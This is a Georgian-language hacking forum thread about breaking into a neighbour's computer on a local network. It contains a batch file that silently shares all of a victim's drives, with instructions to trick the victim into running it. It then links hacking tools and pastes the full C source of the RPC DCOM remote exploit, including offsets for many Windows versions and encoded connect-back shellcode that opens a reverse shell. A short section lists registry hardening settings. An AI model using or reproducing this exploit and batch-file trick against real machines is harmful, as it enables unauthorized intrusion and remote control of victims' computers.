Network hacking & Security, საინტერესოა! პარამეტრები

[khakikrack]

ჯერ გასწავლით როგორ შეიძლაბა მეზობლის კომპიუტერში შესვლა და მერე გასწავლით თავდაცვას.(IMG:style_emoticons/default/wink.gif)

1 ყველაზე ადვილი გზა. ესეიგი ვჯდებით მეზობლის კომპიუტერზე და ვაშარინგებთ დისკებს.
მერე კი ვჯდებით ჩვენს კომიუტერზე და თუ გვინა შევიდეთ მაგალითად დისკ C ზე ბრაუზერში ვწერთ: \\192.168.1.7c

დისკი შეიძლება დავაშარინგოთ ესეც:
ვაკეთებს ბატ ფაილს და შიგნით ვწერთ ამ სოურსს:

პროგრამული კოდი

break off
net share 1$=c:\
net share 2$=d:\
net share 3$=e:\
net share 4$=f:\
net share 5$=g:\
logoff

ეს ბატ ფაილი გაუგზავნეთ თქვენს მეზობელს და დააკლიკინეთ.
\\192.168.0.7 2 <<როცა გინდათ შესვლა D დისკზე
\\192.168.0.7 2$ <-- თუ D დისკი დამალულია
\\192.168.1.7c <<როცა გინდათ შესვლა C დისკზე
\\192.168.1.7c$ <<თუ C დისკი დამალულია

ჯერ ჯერობოთ სულ ეს იყო Network hacking ზე. შემდეგ ჟeრზე უფრო კარგ და რთულ რაღაცას გასწავლით.
ანუ ქსელის კომპიუტერში შევალთ ისე რომ მეზობელთან შესვლა და რაღაცეების გაგზავნა არ დაგვჭირდება!





თავდაცვა:

1. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters შექმენით პარამეტრი სახელად "AutoShareWks" მნიშვნელობით "0"


2. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters პარამეტრს "Hidden" შეუცვალეთ მნიშვნელობა ერთზე! ამით თქვენ დაიმალებით ქსელში


3. KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsaაქ შევქმნათ ისევ DWORD პარამეტრი სახელად "restrictanonymous" მნიშვნელობით 2 (IMG:style_emoticons/default/wink.gif)


წარმატებებს გისურვებთ. (IMG:style_emoticons/default/cool.gif)
და გილოცავთ ყველას დამდეგ შობა ახალ წელს(IMG:style_emoticons/default/wink.gif)

[khakikrack]

Gi0rgius
Giena


http://antichat.caucasus.net/readarticle.php?article_id=4


dardubala

პროგრამული კოდი

http://files.ge/file/160047/dardubala-rar.html

Netcat

პროგრამული კოდი

http://files.ge/file/160048/nc111nt-zip.html

KAHT2 (sp2 ზე არ მუშაობს)

პროგრამული კოდი

http://files.ge/file/160051/SP1-rar.html

KAHT2 SP2 ზეც მუშაობს :

პროგრამული კოდი

//////////////////////////////////////////////////////////////////////////////////////////////
//
//             Windows RPC DCOM Remote Exploit with 18 Targets
//                  by pHrail and smurfy + some offsets by teos
//            
//  Targets:
//                0 Win2k Polish nosp ver 5.00.2195
//                1 Win2k Polish +sp3 ver 5.00.2195
//                2 Win2k Spanish +sp4
//                3 Win2k English nosp 1
//                4 Win2k English nosp 2
//                5 Win2k English +sp1
//                6 Win2k English +sp2 1
//                7 Win2k English +sp2 2
//                8 Win2k English +sp3 1
//                9 Win2k English +sp3 2
//                10 Win2k English +sp4
//                11 Win2k China +sp3
//                12 Win2k China +sp4
//                13 Win2k German +sp3
//                14 Win2k Japanese +sp2
//                15 WinXP English nosp ver 5.1.2600
//                16 WinXP English +sp1 1
//                17 WinXP English +sp1 2
//                18 WinXP English +sp2
//
//////////////////////////////////////////////////////////////////////////////////////////////



#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define DWORD unsigned long
#define SOCKET_ERROR -1

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00

,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45

,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E

,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D

,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41

,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00

,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45

,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00

,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29

,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF

,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09

,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00

,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00

,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00

,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00

,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E

,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00

,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00

,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00

,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00

,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00

,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};



/* Myam add OFFSETS*/
char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */





/* Test this offset
( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
Windows 2000 (no-service-pack) English 0x77e33f6d
0x77f92a9b
0x77e2afc5
0x772254b0 win2k3
0x77E829E3 / 0x77E83587 kokanin win2k sp3
*/
unsigned char sc[]=
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"


"\x29\x4c\xdf\x77" //sp4
//"\x29\x2c\xe2\x77"//0x77e22c29


"\x38\x6e\x16\x76\x0d\x6e\x16\x76"
//下面是SHELLCODE，可以
//SHELLCODE不存在0X00，0X00与0X5C
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
"\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
"\x93\x40\xe2\xfa"
// code
"\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
"\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
"\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
"\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
"\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
"\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
"\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
"\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
"\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
"\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
"\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
"\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
"\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
"\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
"\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
"\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
"\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
"\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
"\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00

,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C

,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

int main(int argc,char ** argv)
{

int len, len1, sockfd;
short port=135;
struct hostent *he;
struct sockaddr_in their_addr;


unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
unsigned short port1;


DWORD cb;



printf("OC192 RPC DCOM Remote Exploit BSD/Linux Port, thanks LSD and XFORCE\n");


if(argc<5)
{

printf("[<$>] OC192 RPC Remote Windows Exploit\n");
printf("[<$>] by pHrail and smurfy + some offsets by teos\n");
printf("[<$>] Thanks to LSD and XForce\n");
printf("[<$>] Usage: %s <victim> <connectback ip> <cb port> <target>\n",argv[0]);
printf("[<$>] On connect back nc -lp cbport\n");
printf("[<$>] Targets: 0 Win2k Polish nosp ver 5.00.2195\n");
printf("[<$>] 1 Win2k Polish +sp3 ver 5.00.2195\n");
printf("[<$>] 2 Win2k Spanish +sp4\n");
printf("[<$>] 3 Win2k English nosp 1\n");
printf("[<$>] 4 Win2k English nosp 2\n");
printf("[<$>] 5 Win2k English +sp1\n");
printf("[<$>] 6 Win2k English +sp2 1\n");
printf("[<$>] 7 Win2k English +sp2 2\n");
printf("[<$>] 8 Win2k English +sp3 1\n");
printf("[<$>] 9 Win2k English +sp3 2\n");
printf("[<$>] 10 Win2k English +sp4\n");
printf("[<$>] 11 Win2k China +sp3\n");
printf("[<$>] 12 Win2k China +sp4\n");
printf("[<$>] 13 Win2k German +sp3\n");
printf("[<$>] 14 Win2k Japanese +sp2\n");
printf("[<$>] 15 WinXP English nosp ver 5.1.2600\n");
printf("[<$>] 16 WinXP English +sp1 1\n");
printf("[<$>] 17 WinXP English +sp1 2\n");
printf("[<$>] 18 WinXP English +sp2\n");
exit(1);
}


if ((he=gethostbyname(argv[1])) == NULL) { // get the host info

perror("gethostbyname");

exit(1);

}

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

perror("socket");

exit(1);

}


their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(port);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);


if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);

exit(1);
}



if(atoi(argv[4])==0)
memcpy(sc+36,win2knosppl,sizeof(win2knosppl));
else if (atoi(argv[4])==1)
memcpy(sc+36,win2ksp3pl,sizeof(win2ksp3pl));
else if (atoi(argv[4])==2)
memcpy(sc+36,win2ksp4sp,sizeof(win2ksp4sp));
else if (atoi(argv[4])==3)
memcpy(sc+36,win2knospeng1,sizeof(win2knospeng1));
else if (atoi(argv[4])==4)
memcpy(sc+36,win2knospeng2,sizeof(win2knospeng2));
else if (atoi(argv[4])==5)
memcpy(sc+36,win2ksp1eng,sizeof(win2ksp1eng));
else if (atoi(argv[4])==6)
memcpy(sc+36,win2ksp2eng1,sizeof(win2ksp2eng1));
else if (atoi(argv[4])==7)
memcpy(sc+36,win2ksp2eng2,sizeof(win2ksp2eng2));
else if (atoi(argv[4])==8)
memcpy(sc+36,win2ksp3eng1,sizeof(win2ksp3eng1));
else if (atoi(argv[4])==9)
memcpy(sc+36,win2ksp3eng2,sizeof(win2ksp3eng2));
else if (atoi(argv[4])==10)
memcpy(sc+36,win2ksp4eng,sizeof(win2ksp4eng));
else if (atoi(argv[4])==11)
memcpy(sc+36,win2ksp3chi,sizeof(win2ksp3chi));
else if (atoi(argv[4])==12)
memcpy(sc+36,win2ksp4chi,sizeof(win2ksp4chi));
else if (atoi(argv[4])==13)
memcpy(sc+36,win2ksp3ger,sizeof(win2ksp3ger));
else if (atoi(argv[4])==14)
memcpy(sc+36,win2ksp2jap,sizeof(win2ksp2jap));
else if (atoi(argv[4])==15)
memcpy(sc+36,winxpnospeng,sizeof(winxpnospeng));
else if (atoi(argv[4])==16)
memcpy(sc+36,winxpsp1eng1,sizeof(winxpsp1eng1));
else if (atoi(argv[4])==17)
memcpy(sc+36,winxpsp1eng2,sizeof(winxpsp1eng2));
else if (atoi(argv[4])==18)
memcpy(sc+36,winxpsp2eng,sizeof(winxpsp2eng));
port1 = htons(atoi(argv[3]));
port1 ^= 0x9393;
cb=inet_addr(argv[2]);
cb ^= 0x93939393;
*(unsigned short *)&sc[330+0x30] = port1;
*(unsigned int *)&sc[335+0x30] = cb;
len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);

*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;
*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;

*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;



if(send(sockfd, bindstr, sizeof(bindstr), 0)== -1){
printf("Send failed pussy.\n");
exit(1);
}

len=recv(sockfd,buf1,1000,NULL);
if (send(sockfd,buf2,len1,0)==SOCKET_ERROR) {

printf("Send failed pussy\n");
return;
}
len=recv(sockfd,buf1,1024,NULL);

}

პ.ს გიო ეხლა მეც ვსწავლობ გლობალში როგორ შევიდე კომპში.
RPC დან მინდა. მანდ ცოტა რთულადაა საქმე. ბანერებით უნდა იჩალიჩო მერე ბევრს ვერაფერსაც ვერ იზამ მარტო ცმდ ს ბრძანებებს შეასრულებ. ეხლა თუ ვუსწავლე telneti ი როგორ დაუქოქო გასწავლით რა..... და კიდევ მეზობელს ვირუსი როგორ უნდა შეუგდოთ ქსელში მაგასაც განახებთ.